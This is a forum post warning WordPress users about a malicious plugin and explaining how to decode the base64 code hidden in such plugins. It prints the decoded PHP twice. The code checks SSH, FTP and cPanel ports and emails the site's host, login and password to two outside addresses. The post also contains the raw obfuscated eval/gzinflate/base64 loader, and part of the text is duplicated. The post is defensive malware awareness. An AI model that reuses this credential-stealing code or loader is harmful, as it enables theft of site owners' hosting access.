12-06-2013, 02:01 PM
I use this method to check base64 code found in a lot of wordpress plugins and scripts. A free plugin called plugin check will analyze your installed plugins and let you know if there's any base64 code, and the location of the code. Goto the code location in the plugins editor section of your wordpress dashboard. Copy the base64 code. Goto http://www.unphp.net/ and paste the code in the decoder. Read the result. Here's the result from a plugin I downloaded on another forum. I apologize, I don't remember the plugin, but here's what I got.The base64 code was:
here is what unphp.net decoded:
$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}
if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}
if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}
$psn ="
-------------------------------------------------------------------------
Cpanel Update Info [ Recode by Mask_magicianZ ]
-------------------------------------------------------------------------
Host : $domain
User : $login
Pass : $pass
-------------------------------------------------------------------------
Accept Port
SSH : Port $a1
FTP : Port $a2
cPanel : Port $a3
-------------------------------------------------------------------------
. 2011 Mask_magicianz Powered by RosebanditZ
-------------------------------------------------------------------------
";
$to = "quantum.princes@yahoo.com";
$recip = "john.cpbox@yahoo.com";
$subject = "cPanel AccesS Update";
$headers = "From: update";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);
as you can see, this code was designed to take your password, user login, and your domain url, and email it to the email above. Wow. Anyway, I'm sure you seasoned vets already know about this, but us newbies can fall prey to it. Beware, Check everything.
eval(gzinflate(base64_decode('rVPRTtswFH2PlH/woki0Uqhw+oLomJimou5hWtSUPcBQ5TouDSS+np0I2LQP2l/ia6egofQtzYPt
43POvb2+NwziAmpWSnJO4nU+X/6YL2+OFqtVtl58z1dHt7MwiFVK7XVK/T7Ffer3J6fuZBc8c3+5
NcAfQAk56rwTVCWx0FqCW0yjE3oy7jT0kIYe1vjAvSp71a/Dr9yOPrg8x2HwJ2b0PJprDTqa/Q0D
URmxR/OWc2FMNNvyCowYeQ2y3jyo90h7PdJ+D/rOwybrXaa9LtN+F1R5H3wFYx8vCoPjoX4/ZRh8
UUyKilypgjWCfJVbIDdkKTgUgmyeyTdmHtY1uyt5yeQ1uSWoGTSBBZiGnJHuXRG5MkIjUsGdBzJm
DALKroPH/2yrrhqSgW7cn8vzhY3ljrZBELlcZW9IigjPXNFewengWf2zs0bp/+X/bcM9Ci0KfJil
bZENk0XZXA8cPMLJa8BOXfSrZbJp64nSpbS9efHMdgATDrXjaMFLhbR72MkJVxt4escw7eZe8AY5
Xcmw2ibv2s1xdoIVQhvkXGqoz0jr7j5K8WguuDr2x0lpO/MTCmyXVCObX7J3T3Awkr3P+JXi0jvI
egE=')))
43POvb2+NwziAmpWSnJO4nU+X/6YL2+OFqtVtl58z1dHt7MwiFVK7XVK/T7Ffer3J6fuZBc8c3+5
NcAfQAk56rwTVCWx0FqCW0yjE3oy7jT0kIYe1vjAvSp71a/Dr9yOPrg8x2HwJ2b0PJprDTqa/Q0D
URmxR/OWc2FMNNvyCowYeQ2y3jyo90h7PdJ+D/rOwybrXaa9LtN+F1R5H3wFYx8vCoPjoX4/ZRh8
UUyKilypgjWCfJVbIDdkKTgUgmyeyTdmHtY1uyt5yeQ1uSWoGTSBBZiGnJHuXRG5MkIjUsGdBzJm
DALKroPH/2yrrhqSgW7cn8vzhY3ljrZBELlcZW9IigjPXNFewengWf2zs0bp/+X/bcM9Ci0KfJil
bZENk0XZXA8cPMLJa8BOXfSrZbJp64nSpbS9efHMdgATDrXjaMFLhbR72MkJVxt4escw7eZe8AY5
Xcmw2ibv2s1xdoIVQhvkXGqoz0jr7j5K8WguuDr2x0lpO/MTCmyXVCObX7J3T3Awkr3P+JXi0jvI
egE=')))
here is what unphp.net decoded:
$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}
if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}
if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}
$psn ="
-------------------------------------------------------------------------
Cpanel Update Info [ Recode by Mask_magicianZ ]
-------------------------------------------------------------------------
Host : $domain
User : $login
Pass : $pass
-------------------------------------------------------------------------
Accept Port
SSH : Port $a1
FTP : Port $a2
cPanel : Port $a3
-------------------------------------------------------------------------
. 2011 Mask_magicianz Powered by RosebanditZ
-------------------------------------------------------------------------
";
$to = "quantum.princes@yahoo.com";
$recip = "john.cpbox@yahoo.com";
$subject = "cPanel AccesS Update";
$headers = "From: update";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);
as you can see, this code was designed to take your password, user login, and your domain url, and email it to the email above. Wow. Anyway, I'm sure you seasoned vets already know about this, but us newbies can fall prey to it. Beware, Check everything.